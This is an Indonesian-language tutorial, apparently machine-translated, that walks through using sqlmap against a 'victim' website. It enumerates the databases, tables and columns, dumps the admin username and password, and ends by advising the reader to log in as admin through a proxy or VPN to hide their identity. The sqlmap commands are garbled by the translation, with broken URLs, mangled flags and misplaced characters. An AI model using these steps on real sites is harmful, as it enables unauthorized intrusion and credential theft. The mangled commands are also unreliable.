1. Buka terminal mundur dan jenis cd / pentest / database / sqlmap dan tekan enter. Sekarang sqlmap terbuka di terminal Anda
![[sql-map-13.png]](http://lh4.ggpht.com/-iz2rxqtV59o/UA6NuvHb-dI/AAAAAAAACR4/OiRZb6pqbUo/s1600/sql-map-13.png)
2. Sekarang menemukan situs rentan. (Baik saya sudah memiliki situs rentan)
![[sql-map-2-3.png]](http://lh3.ggpht.com/-0BrxNXfNea4/UA6N3WN7KmI/AAAAAAAACSI/_U-WMHsx2Us/s1600/sql-map-2-3.png)
3. Sekarang ketik perintah ini di terminal dan tekan enter. (Lihat di atas gambar)
python sqlmap.py-u http://yourvictim 'menyelinap / index.php id =? 4 -dbs
4. Sekarang Anda akan mendapatkan nama database website
Yah aku punya dua database aj dan information_schema kita akan memilih database aj.
5. Sekarang mendapatkan tabel database tersebut. untuk itu Anda perlu memasukkan perintah ini ke terminal Anda dan hanya tekan Enter.
python sqlmap.py-u slink / index.php http://yourvictim '? id = 4 -D (nama database)-tabel
6. Sekarang kita perlu untuk mengambil tabel dari database aj. paste perintah bawah perintah dan tekan enter.
python sqlmap.py-u http://www.yourvictim 'slink.com / index.php id =? 4 -D aj-tabel
7. Sekarang Anda akan mendapatkan daftar tabel yang disimpan dalam database aja
8. Sekarang mari kita ambil kolom dari tabel admin
python sqlmap.py-u http://www.yourvictim 'slink.com / index.php id = 4? -T admin - kolom
Sekarang kita punya kolom dan kami mendapat username dan password
9. Sekarang mari kita ambil password admin
python sqlmap.py-u ? slink.com / index.php http://www.yourvictim 'id = 4 -T admin-U test - dump
Sekarang kita punya username dan password dari website!
Sekarang hanya menemukan admin pidana website dan menggunakan proxy /
vpn ketika Anda mencoba untuk login di website sebagai admin
